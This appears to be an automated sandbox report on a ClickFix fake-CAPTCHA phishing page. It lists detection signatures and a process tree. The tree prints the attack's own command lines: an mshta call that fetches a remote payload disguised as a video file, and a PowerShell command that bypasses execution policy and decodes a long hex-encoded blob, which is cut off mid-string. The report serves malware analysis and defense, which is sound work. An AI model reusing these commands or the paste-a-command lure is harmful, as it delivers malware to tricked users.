Edit tour
Windows
Analysis Report
https://sos-at-vie-1.exo.io/ilbuck/sato/process/continue-after-check-vr2.html
Overview
General Information
Detection
CAPTCHA Scam ClickFix
Score: | 80 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detect drive by download via clipboard copy & paste
Yara detected CAPTCHA Scam ClickFix
AI detected suspicious Javascript
Bypasses PowerShell execution policy
Phishing site or detected (based on various text indicators)
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64_ra
- chrome.exe (PID: 2040 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed "about :blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA) - chrome.exe (PID: 2896 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2172 --fi eld-trial- handle=195 2,i,138470 4334151151 4745,63658 9946233111 3190,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
- chrome.exe (PID: 6368 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" "htt ps://sos-a t-vie-1.ex o.io/ilbuc k/sato/pro cess/conti nue-after- check-vr2. html" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
- svchost.exe (PID: 6812 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- mshta.exe (PID: 7540 cmdline:
"C:\Window s\system32 \mshta.exe " https:// buck1st.os s-ap-south east-5.ali yuncs.com/ dir/five/s ingl5.mp4 # ? ''I am not a rob ot - reCAP TCHA Verif ication ID : 2165 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - powershell.exe (PID: 7672 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction ngyV ($kqZz){re turn -spli t ($kqZz - replace '. .', '0x$& ')};$edQG = ngyV('9B 37E06BF956 AECEC578DA 8836BB78F6 D34FFAAAB8 91B80DE109 8BA526A0C0 9B9695FEFF 097B0E5D22 EDB5F917A4 4C1326CE6A D173B86B20 3E0CFD1CA1 A3D0BCE6D3 83CC7F582E 9B9F2BBA42 84D557E975 8AA78A3B57 ECA89C28C7 84A8E32908 5BE2BC7463 385D85C174 1CA02C8F95 7ADD24A3F7 A816E19BAD 7EE2EBD004 75BE81C954 EBFA720D80 C866283B1A 22A4CD86E2 C6C6592F98 149C7B4641 DAF3C3A9FA 1FB67A0F97 B429C9381B 5B78E16C82 82E5165729 14520C8403 40519F48BF 258E33E622 628A1802A3 521F2E7500 CF05B273B1 F2F0BB2885 57E9D9A484 9346086BC8 AC9D070C1E 9680E82B50 59338903C6 54502C235B CF39F59307 80F87688F2 11693AAD4C 85F2A4F203 329223AF49 BAA6BD8A9E 30A0EA4662 68AF322586 522882DD85 0D831A8C7B 19F05D13E7 BE8E622FD5 3A5F545B56 7857240D12 F878F254A0 58EE68A804 A8C5A188AA 558BAC50F2 B0A7AFA884 C71642B1C8 7B205CA320 AD4488AD28 5B5A12B463 CD1A139A8F E9FF69844D 4211C9420B 0B312F1AAD 3F4E102852 64572A8EC2 89A2A1BB92 28DCF63848 32BF858767 B194D0E3C5 31CAE2A436 51E803DBDC 27FE25FB0B 2FB720EA61 90A1C47926 526570B387 CE4274445D 0E23F2AF55 B7BF63FAB1 4D68A3CED3 482CA6609A C6E7F86485 14FB954D7B 5E41FCA134 08621EA58A FBCA78BCD5 68D73A93A5 C2571B4CAC 34385785FE ACE6DF3FD9 92C12379C6 63884CBB14 90FEF5F60A F555D11FEE BA3A51FDD1 686DB209B6 A45CEB4823 BE5862CE62 3891963721 BC6D253E89 976C4DBC73 8ADC80865C 0C9B06E392 57E93404BE 53A986B183 7F5CBBEB65 D935F0968B A068178C2D FE472704F5 EE5051AAEB ED38C2C21D 22D49ACD6E 20B980EB60 1F7B26BA53 88D1EB0FCF 1ABE96D767 F1201814DB 196FE39ED8 11F30374DE 84F48CE14A 95DF7A9828 928513F0F8 35399CDDE2 5521FB55DE 3C25C82743 9AB6D74976 549CF60F2C 8CFD3F4096 2CDA691A75 EEB181B563 5A31DC1DE5 8AECE0D2EC A39E94F2B1 88D188810B AECC3F8508 00E8709791 D5B8F3DA6B 019DFC9808 0EBF566E4E 19A0C43383 9BE0C7C23C 4D8EDEEEA9 70368D7A2C 06852DE410 B551DAD93D 49797E4F4D 373055A307 208B597C67 3333EC2EC0 4894E30ED7 1A71EFF7D7 FA2C34D1DE 9BB5AF474D 96717FBC22 0E301F28A1 5F7B9A6C58 CABFF5CF07 EDAE1BA0A8 0E569B8760 7BC2391C24 99AA3130EA C4E93E6CE2 D4C26D1B3D 7ADA076444 AD18C15B4C 1A6B50EDA2 1A99ACB63C 79827781C5 CC4EE59186 C6A336AB5D A69D61E740 3756263EAF B9C5476A73 0683EBBB4E 8AB1EEA466 80320331E9 5AE08F35FC 1F5D4F7F73 22ACD03CE2 FE52A457C9 CBC8B7A21D 77E7ACA744 BC0388622B 84AC5392D8 68B2D6BFCB C3AD0EB988 4B4F5E38AA 3281670859 07DD5A514F EA69EDD4A2 C63970C28F E3E84F65D6 BE17880E46 51F73FC1C8 D6768D0222 5876EFEAFE CBD40E226C BCB292F233 A51A2A85C0 0443B097A2 2DF3C38FCC 6702D6AD5B F2EEA9EDB1 35100E8B41 618EB2582A 6BDD56616E 5786D27E29 F830DAC709 1A21C99540 937BF224E0 60BDB84D22 E7E6156CB8 42471D3FD0 587EA5F279 65C6EC0C5F 9A2745459D AD59008DC5 0EF1A3160E